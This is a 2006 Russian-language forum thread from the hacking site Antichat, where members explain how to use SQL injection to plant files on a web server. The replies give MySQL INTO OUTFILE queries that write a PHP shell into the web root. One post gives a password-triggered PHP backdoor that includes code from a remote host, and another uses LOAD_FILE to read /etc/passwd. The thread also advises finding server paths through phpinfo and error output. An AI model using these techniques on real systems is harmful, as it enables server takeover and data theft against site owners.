Помогите с Sql

Discussion in 'Песочница' started by TAZMAD, 17 Dec 2006.

  1. TAZMAD

    TAZMAD New Member

    Joined:
    19 Nov 2004
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, хотел бы спросить у более знающих, какой командой можно залить файл на сервер с помощью Sql. :)


    Зарание благодарен....
     
    #1 TAZMAD, 17 Dec 2006
  2. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    select 'file_content' INTO OUTFILE '/путь'
     
    #2 InferNo23, 17 Dec 2006
  3. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    outfile
    Code:
    
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
     
    #3 GreenBear, 17 Dec 2006
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Точнее сначала нужно засунуть в запись name с id=0 пхп код ) я например люблю что-ниб вроде
    PHP:
    <? 
    if (    $_POST ['someshit'] == "killme")
    {
    include (    "http://someshit.nm.ru/br/s.php");

    else 
    {
    die;
    }
    ?>
    а уже после делать то что написал Green_Bear =)
     
    #4 darky, 17 Dec 2006
  5. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    а не проще ли сделать
    Code:
    SELECT '<? include($i); ?>' FROM table INTO OUTFILE '/path/to/file/shell.php';
     
    _________________________
    #5 nc.STRIEM, 18 Dec 2006
  6. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    а если путь не известен?
     
    #6 }{0TT@БЬ)Ч, 18 Dec 2006
    1 person likes this.
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    То узнай его...
     
    #7 guest3297, 18 Dec 2006
  8. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Как если ошибка не выводится?
     
    #8 }{0TT@БЬ)Ч, 18 Dec 2006
  9. SQLHACK

    SQLHACK Остались только слоны

    Joined:
    27 Sep 2006
    Messages:
    437
    Likes Received:
    372
    Reputations:
    407
    что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

    это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

    или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

    А какая версия SQL сервера mysql, mssql &
     
    _________________________
    #9 SQLHACK, 18 Dec 2006
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    }{0TT@БЬ)Ч
    Что мешает phpinfo другие файлы с выводом ошибок пройтись по cgi посмотреть другие сайты на этом же хостинге провести аналогию..
     
    #10 guest3297, 19 Dec 2006
  11. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    mysql 4.0.21 прав мало походу не могу прочесть passwd, локального инклуда нету.
     
    #11 }{0TT@БЬ)Ч, 19 Dec 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.